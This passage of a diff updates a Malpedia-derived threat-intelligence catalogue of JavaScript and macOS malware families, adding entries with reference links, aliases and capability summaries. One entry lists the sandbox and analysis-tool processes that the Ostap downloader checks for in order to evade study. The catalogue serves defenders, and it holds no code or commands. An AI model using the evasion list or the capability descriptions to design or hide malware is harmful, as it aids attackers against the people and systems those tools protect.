"https://blog.morphisec.com/cobalt-gang-2.0" ], "synonyms": [ + "SKID", "SpicyOmelette" ], "type": [] @@ -2473,6 +5056,39 @@ "uuid": "3e46af39-52e8-442f-aff1-38eeb90336fc", "value": "NanHaiShu" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.node_rat", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", + "https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e3b0ed5c-4e6a-4f50-bef2-1f7112aa31ed", + "value": "NodeRAT" + }, + { + "description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisor\u2019s guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap", + "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/", + "https://www.intrinsec.com/deobfuscating-hunting-ostap/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/", + "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a3b93781-c51c-4ccb-a856-804331470a9d", + "value": "ostap" + }, { "description": "", "meta": { @@ -2486,13 +5102,44 @@ "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", "value": "Powmet" }, + { + "description": "According to Trend Micro, this is a Node.js based malware, that can download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management, among other things. It targets Windows and has components for both 32 and 64bit.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.qnodeservice", + "https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/", + "https://www.telsy.com/wp-content/uploads/MAR_93433_WHITE.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "52d9260f-f090-4e79-b0b3-0c89f5db6bc6", + "value": "QNodeService" + }, + { + "description": "QUICKCAFE is an encrypted JavaScript downloader for QUICKRIDE.POWER that exploits the ActiveX M2Soft vulnerabilities. QUICKCAFE is obfuscated using JavaScript Obfuscator.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.quickcafe", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "475766d2-1e99-4d81-89e4-0d0df4a562d0", + "value": "QUICKCAFE" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/", + "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global", "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", - "http://resources.infosecinstitute.com/scanbox-framework/" + "http://resources.infosecinstitute.com/scanbox-framework/", + "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/" ], "synonyms": [], "type": [] @@ -2505,7 +5152,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat", - "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/" + "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [], "type": [] @@ -2513,11 +5161,25 @@ "uuid": "d51cb8f8-cca3-46ce-a05d-052df44aef40", "value": "SQLRat" }, + { + "description": "According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.starfighter", + "https://github.com/Cn33liz/StarFighters" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f6c80748-1cce-4f6b-92e9-f8a04ff3464a", + "value": "Starfighter (Javascript)" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" ], "synonyms": [], @@ -2543,7 +5205,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050", + "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_001", "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f", "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef" ], @@ -2551,7 +5213,66 @@ "type": [] }, "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", - "value": "Unidentified 050 (APT32 Profiler)" + "value": "Unidentified JS 001 (APT32 Profiler)" + }, + { + "description": "According to Max Kersten, Emotet is dropped by a procedure spanned over multiple stages. The first stage is an office file that contains a macro. This macro then loads the second stage, which is either a PowerShell script or a piece of JavaScript, which is this family entry.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_003", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-javascript-downloader/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7bf28be0-3153-474d-8df7-e12fec511d7e", + "value": "Unidentified JS 003 (Emotet Downloader)" + }, + { + "description": "A simple loader written in JavaScript found by Marco Ramilli.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_004", + "https://marcoramilli.com/2020/11/27/threat-actor-unkown/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a15e7c49-4eb6-46f0-8f79-0b765d7d4e46", + "value": "Unidentified JS 004" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_js_002" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7144063f-966b-4277-b316-00eb970ccd52", + "value": "Unidentified JS 002" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.valak", + "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7", + "https://twitter.com/malware_traffic/status/1207824548021886977", + "https://security-soup.net/analysis-of-valak-maldoc/", + "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", + "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/", + "https://unit42.paloaltonetworks.com/valak-evolution/", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html" + ], + "synonyms": [ + "Valek" + ], + "type": [] + }, + "uuid": "b37b4d91-0ac7-48f5-8fd1-5237b9615cf7", + "value": "Valak" }, { "description": "", @@ -2571,19 +5292,37 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus", - "https://securelist.com/operation-applejeus/87553/" + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", + "https://objective-see.com/blog/blog_0x54.html", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://securelist.com/operation-applejeus-sequel/95596/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", + "https://securelist.com/operation-applejeus/87553/", + "https://objective-see.com/blog/blog_0x5F.html", + "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56", + "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://objective-see.com/blog/blog_0x49.html" ], "synonyms": [], "type": [] }, "uuid": "ca466f15-8e0a-4030-82cb-5382e3c56ee5", - "value": "AppleJeus" + "value": "AppleJeus (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", + "https://threatintel.blog/OPBlueRaven-Part2/", "https://github.com/kai5263499/Bella", "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/" ], @@ -2593,6 +5332,23 @@ "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", "value": "Bella" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bundlore", + "https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c", + "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" + ], + "synonyms": [ + "SurfBuyer" + ], + "type": [] + }, + "uuid": "5f5f5496-d9f8-4984-aa66-8702741646fe", + "value": "Bundlore" + }, { "description": "", "meta": { @@ -2611,10 +5367,24 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.casso", + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "387e1a19-458d-4961-a8e4-3f82463085e5", + "value": "Casso" + }, + { + "description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. \r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didn\u2019t match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patcher\u2018s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim\u2019s Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a \u201cPop-up blocker\u201d. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker\u2019s address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victim\u2019s computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victim\u2019s hard drive to a remote server\r\n- update itself to a newer version", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", + "https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/" ], "synonyms": [], "type": [] @@ -2627,6 +5397,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", + "https://objectivebythesea.com/v2/talks/OBTS_v2_Seele.pdf", "https://objective-see.com/blog/blog_0x2A.html" ], "synonyms": [], @@ -2676,7 +5447,7 @@ "type": [] }, "uuid": "2bb6c494-8057-4d83-9202-fda3284deee4", - "value": "Crisis (OS X)" + "value": "Crisis" }, { "description": "", @@ -2691,6 +5462,28 @@ "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", "value": "Crossrider" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability", + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://www.sygnia.co/mata-framework", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://objective-see.com/blog/blog_0x5F.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "https://objective-see.com/blog/blog_0x57.html", + "https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "81def650-f52e-49a3-a3fe-cb53ffa75d67", + "value": "Dacls (OS X)" + }, { "description": "", "meta": { @@ -2732,7 +5525,7 @@ "value": "Dummy" }, { - "description": "", + "description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victim\u2019s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victim\u2019s webcam\r\n- Sending emails with an attachment", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor", @@ -2744,6 +5537,20 @@ "uuid": "c221e519-fe3e-416e-bc63-a2246b860958", "value": "Eleanor" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.electro_rat", + "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/", + "https://objective-see.com/blog/blog_0x61.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f8ccf928-7d4f-4999-91a5-9222f148152d", + "value": "ElectroRAT" + }, { "description": "", "meta": { @@ -2758,6 +5565,26 @@ "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", "value": "EvilOSX" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest", + "https://github.com/gdbinit/evilquest_deobfuscator", + "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/", + "https://objective-see.com/blog/blog_0x59.html", + "https://objective-see.com/blog/blog_0x5F.html", + "https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/", + "https://twitter.com/dineshdina04/status/1277668001538433025" + ], + "synonyms": [ + "ThiefQuest" + ], + "type": [] + }, + "uuid": "d5b39223-a8cc-4d47-8030-1d7d6312d351", + "value": "EvilQuest" + }, { "description": "", "meta": { @@ -2771,6 +5598,23 @@ "uuid": "5dfd704c-a69d-4e93-bd70-68f89fbbb32c", "value": "FailyTale" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.finfisher", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", + "https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/", + "https://objective-see.com/blog/blog_0x4F.html", + "https://objective-see.com/blog/blog_0x5F.html", + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "89ce536c-03b9-4f69-83ce-723f26b36494", + "value": "FinFisher (OS X)" + }, { "description": "", "meta": { @@ -2778,9 +5622,12 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", + "https://en.wikipedia.org/wiki/Flashback_(Trojan)", "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" ], - "synonyms": [], + "synonyms": [ + "FakeFlash" + ], "type": [] }, "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", @@ -2792,11 +5639,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", - "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", + "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", - "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", - "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf" + "https://objectivebythesea.com/v3/talks/OBTS_v3_tReed.pdf", + "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/" ], "synonyms": [ "Quimitchin" @@ -2806,6 +5653,24 @@ "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", "value": "FruitFly" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera", + "https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/", + "https://objective-see.com/blog/blog_0x53.html", + "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/" + ], + "synonyms": [ + "Kassi", + "StockSteal" + ], + "type": [] + }, + "uuid": "1c65cf4e-5df4-4d56-a414-7b05f00814ba", + "value": "Gmera" + }, { "description": "", "meta": { @@ -2820,10 +5685,11 @@ "value": "HiddenLotus" }, { - "description": "", + "description": "The threat was a multi-stage malware displaying a decoy that appeared to the victim as a Chinese language article on the long-running dispute over the Diaoyu Islands; an array of erotic pictures; or images of Tibetan organisations. It consisted of two stages: Revir was the dropper/downloader and Imuler was the backdoor capable of the following operations:\r\n\r\n- capture screenshots\r\n- exfiltrate files to a remote computer\r\n- send various information about the infected computer\r\n- extract ZIP archive\r\n- download files from a remote computer and/or the Internet\r\n- run executable files", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", + "https://www.welivesecurity.com/2012/03/16/osximuler-updated-still-a-threat-on-mac-os-x/", "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" ], @@ -2835,6 +5701,24 @@ "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", "value": "iMuler" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab", + "https://archive.f-secure.com/weblog/archives/00002576.html", + "https://securelist.com/deathstalker-mercenary-triumvirate/98177/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.macmark.de/blog/osx_blog_2013-08-a.php", + "https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/", + "https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "01325d85-297f-40d5-b829-df9bd996af5a", + "value": "Janicab" + }, { "description": "", "meta": { @@ -2855,9 +5739,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", - "https://objective-see.com/blog/blog_0x16.html", + "https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/", + "https://github.com/eset/malware-ioc/tree/master/keydnap", "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", - "https://github.com/eset/malware-ioc/tree/master/keydnap" + "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] @@ -2934,6 +5819,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://iranthreats.github.io/resources/macdownloader-macos-malware/" ], "synonyms": [], @@ -3008,13 +5894,29 @@ "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", "value": "MaMi" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.manuscrypt", + "https://twitter.com/BitsOfBinary/status/1321488299932983296", + "https://twitter.com/BitsOfBinary/status/1337330286787518464", + "https://www.anquanke.com/post/id/223817" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f85c3ec9-81f0-4dee-87e6-b3f6b235bfe7", + "value": "Manuscrypt" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/", - "https://objective-see.com/blog/blog_0x16.html" + "https://objective-see.com/blog/blog_0x16.html", + "https://objective-see.com/blog/blog_0x53.html" ], "synonyms": [], "type": [] @@ -3040,11 +5942,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", - "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" + "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/", + "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", + "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/", + "https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468", + "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam" ], "synonyms": [], "type": [] @@ -3068,6 +5975,19 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.osaminer", + "https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "89d0c423-c4ff-46e8-8c79-ea5e974e53e7", + "value": "OSAMiner" + }, + { + "description": "This crypto-ransomware for macOS was caught spreading via BitTorrent distribution sites in February 2017, masquerading as 'Patcher', an application used for pirating popular software like Adobe Premiere Pro or Microsoft Office for Mac.\r\n\r\nThe downloaded torrent contained an application bundle in the form of a single zip file. After launching the fake application, the main window of the fake cracking tool was displayed.\r\n\r\nThe file encryption process was launched after the misguided victim clicked 'Start'. Once executed, the ransomware generated a random 25-character string and set it as the key for RC4 encryption of all of the user's files. It then demanded ransom in Bitcoin, as instructed in the 'README!' .txt file copied all over the user's directories.\r\n\r\nDespite the instructions being quite thorough, Patcher lacked the functionality to communicate with any C&C server, and therefore made it impossible for its operators to decrypt affected files. The randomly generated encryption key was also too long to be guessed via a brute-force attack, leaving the encrypted data unrecoverable in a reasonable amount of time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", @@ -3083,7 +6003,7 @@ "value": "Patcher" }, { - "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.", + "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized", @@ -3102,6 +6022,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf" ], "synonyms": [], @@ -3152,8 +6073,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", + "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/" ], "synonyms": [ @@ -3164,6 +6085,34 @@ "uuid": "80acc956-d418-42e3-bddf-078695a01289", "value": "Dok" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.shlayer", + "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://securelist.com/shlayer-for-macos/95724/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c3ee82df-a004-4c68-89bd-eb4bb2dfc803", + "value": "Shlayer" + }, + { + "description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple\u2019s new M1 chips but has been distributed without payload so far.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow", + "https://redcanary.com/blog/clipping-silver-sparrows-wings/#technical-analysis" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f6a7aeeb-fcc5-4d26-9eab-c0b6e2819a6c", + "value": "Silver Sparrow" + }, { "description": "General purpose backdoor", "meta": { @@ -3190,6 +6139,20 @@ "uuid": "59d4a2f3-c66e-4576-80ab-e04a4b0a4317", "value": "Tsunami (OS X)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.unidentified_001", + "https://objective-see.com/blog/blog_0x51.html", + "https://securelist.com/operation-applejeus-sequel/95596/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1c96f6b9-6b78-4137-9d5f-aa5575f80daa", + "value": "Unidentified macOS 001 (UnionCryptoTrader)" + }, { "description": "", "meta": { @@ -3204,6 +6167,35 @@ "uuid": "13173d75-45f0-4183-8e18-554a5781405c", "value": "Uroburos (OS X)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.vigram", + "https://twitter.com/ConfiantIntel/status/1351559054565535745" + ], + "synonyms": [ + "WizardUpdate" + ], + "type": [] + }, + "uuid": "021e2fb4-1744-4fde-8d59-b247f1b34062", + "value": "Vigram" + }, + { + 